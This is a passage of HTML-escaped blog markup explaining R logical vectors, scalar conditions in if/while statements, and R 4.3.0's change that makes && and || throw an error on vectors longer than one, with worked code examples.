&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(diamonds&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;carat &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE FALSE FALSE FALSE TRUE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(diamonds, carat &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 49,737 × 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## carat cut color clarity depth table price x y z&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;dbl&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 0.31 Good J SI2 63.3 58 335 4.34 4.35 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 0.31 Ideal J SI2 62.2 54 344 4.35 4.37 2.71&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 0.32 Premium E I1 60.9 58 345 4.38 4.42 2.68&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 0.31 Very Good J SI1 59.4 62 353 4.39 4.43 2.62&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 0.31 Very Good J SI1 58.1 62 353 4.44 4.47 2.59&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 0.31 Good H SI1 64 54 402 4.29 4.31 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 0.33 Ideal I SI2 61.8 55 403 4.49 4.51 2.78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 0.33 Ideal I SI2 61.2 56 403 4.49 4.5 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 0.33 Ideal J SI1 61.1 56 403 4.49 4.55 2.76&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 0.32 Good H SI2 63.1 56 403 4.34 4.37 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 49,727 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But there are places where you use logical values, where it would make
no sense (and could potentially be dangerous) to use a multivalued
logical vector. We use &lt;code&gt;if (...) {}&lt;/code&gt; and &lt;code&gt;while (...) {}&lt;/code&gt; statements for
flow control in R. The conditional expression in these statements (the
&lt;code&gt;...&lt;/code&gt; in &lt;code&gt;if (...) {}&lt;/code&gt;) should always evaluate to a logical scalar:
either &lt;code&gt;TRUE&lt;/code&gt; or &lt;code&gt;FALSE&lt;/code&gt;.&lt;/p&gt;
&lt;!--- Sidenote ... sidenote ... interpretable as a logical --&gt;
&lt;p&gt;When R 4.2.0 was released, stricter guarantees were placed on the length
of these conditional expressions. We mentioned this in an &lt;a href="https://www.jumpingrivers.com/blog/new-features-r420/" rel="external"&gt;earlier blog
post&lt;/a&gt;. So in
addition to getting an error when the conditional is empty, we now get
an error when the conditional is too long:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Comparison with an empty logical vector:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;logical&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;I didn&amp;#39;t expect to get here&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Error in if (logical(0)) {: argument is of length zero&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Comparison with an over-sized logical vector:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;numbers &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(numbers &lt;span style="color:#ff7b72;font-weight:bold"&gt;%%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Determine if even&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE FALSE FALSE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (numbers &lt;span style="color:#ff7b72;font-weight:bold"&gt;%%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Should we ever be allowed to get here?&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Error in if (numbers%%2 == 0) {: the condition has length &amp;gt; 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Previously, R would use the first entry in a non-scalar conditional
vector to decide whether to enter the &lt;code&gt;if&lt;/code&gt; or &lt;code&gt;while&lt;/code&gt; block.&lt;/p&gt;
&lt;!--- Compare mtcars$cyl and mtcars$cyl == 4
data.frame(cyl = mtcars$cyl, has_4_cylinders = mtcars$cyl==4)
--&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-whats-new-r43"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="strictly-comparing"&gt;Strictly comparing&lt;/h3&gt;
&lt;p&gt;So, we have two main ways of using a logical vector, one of which now
requires that the vector is a scalar.&lt;/p&gt;
&lt;p&gt;Another place where it is really important to know the length of your
vectors is when combining logical values together.&lt;/p&gt;
&lt;p&gt;R has a number of ways to combine logical values together that build on
the AND and OR operations in Boolean algebra:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;all&lt;/code&gt; and &lt;code&gt;any&lt;/code&gt; for combining the values in a single vector (are
&lt;code&gt;all&lt;/code&gt; of the values TRUE; are &lt;code&gt;any&lt;/code&gt; of the values TRUE)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;&lt;/code&gt;, &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; (representing “AND”), &lt;code&gt;|&lt;/code&gt;, and &lt;code&gt;||&lt;/code&gt; (for “OR”) for
combining two different vectors&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_r_released &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_already_tomorrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Logical AND within a single vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;all&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(is_april, is_r_released, is_already_tomorrow))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Logical OR within a single vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;any&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(is_april, is_r_released, is_already_tomorrow))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Logical AND between vectors&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; is_r_released
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; is_already_tomorrow
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Logical OR between vectors&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; is_r_released
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; is_already_tomorrow
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For scalars, there’s no difference between the single-character
operators (&lt;code&gt;&amp;amp;&lt;/code&gt;, &lt;code&gt;|&lt;/code&gt;) and the two-character operators (&lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;, &lt;code&gt;||&lt;/code&gt;). So
why have a pair of operators for each concept?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and &lt;code&gt;||&lt;/code&gt; are intended for use &lt;em&gt;solely&lt;/em&gt; with scalars, they
return a single logical value.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;&lt;/code&gt; and &lt;code&gt;|&lt;/code&gt; work with multivalued vectors, they return a vector
whose length matches their input arguments.&lt;/li&gt;
&lt;/ul&gt;
&lt;!--- sidenote, sidenote, subject to R's rules for vector recycling --&gt;
&lt;p&gt;Since they always return a scalar logical, you &lt;em&gt;should&lt;/em&gt; use &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and
&lt;code&gt;||&lt;/code&gt; in your if/while conditional expressions (when needed). If an &lt;code&gt;&amp;amp;&lt;/code&gt;
or &lt;code&gt;|&lt;/code&gt; is used, you may end up with a non-scalar vector inside
&lt;code&gt;if (...) {}&lt;/code&gt; and R will throw an error.&lt;/p&gt;
&lt;p&gt;To illustrate the difference between the scalar operators and vectorised
operators, here’s an example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The vectorised operators apply AND/OR on matched pairs of elements:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; y &lt;span style="color:#8b949e;font-style:italic"&gt;# c(x[1] &amp;amp;&amp;amp; y[1], x[2] &amp;amp;&amp;amp; y[2], ...)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE FALSE FALSE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; y &lt;span style="color:#8b949e;font-style:italic"&gt;# c(x[1] || y[1], x[2] || y[2], ...)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE TRUE TRUE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In R 4.2.0, a warning is thrown when a non-scalar input is passed to the
scalar-operators. But, a scalar logical is returned (here, the result of
&lt;code&gt;x[1] &amp;amp;&amp;amp; y[1]&lt;/code&gt;). In earlier versions of R, no warning was printed.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning messages&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; In x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length(x) = 4 &amp;gt; 1&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; In x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length(x) = 4 &amp;gt; 1&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This could lead to hidden bugs. For example, if you used this code in an
&lt;code&gt;if&lt;/code&gt; conditional, a warning would be printed when a non-scalar vector
was used but the code would continue happily:&lt;/p&gt;
&lt;!--- perhaps note that the &amp;, though utterly incorrect, would actually catch this bug here --&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The world can&amp;#39;t end today...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#a5d6ff"&gt;&amp;#34;The world can&amp;#39;t end today...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning messages&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; In x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length(x) = 4 &amp;gt; 1&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; In x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length(x) = 4 &amp;gt; 1&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In R 4.3.0, this warning has been elevated to an error and no value is
returned:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Error &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length = 4&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This more strict version of the scalar comparison operators will help
catch those bugs where you didn’t realise a logical variable could
contain more than one entry.&lt;/p&gt;
&lt;!--- Compare the purpose of vector-wise comparison (&amp;) with scalar-logic comparison (&amp;&amp;) --&gt;
&lt;!--- Errors in R4.3 from non-scalar comparison --&gt;
&lt;!--- This builds on changes in R4.2 --&gt;
&lt;p&gt;To check whether the strict comparison operators will affect your
existing code, before upgrading to R 4.3.0, you can set an environment
variable before running it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In R:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.setenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;_R_CHECK_LENGTH_1_LOGIC2&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-whats-new-r43"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
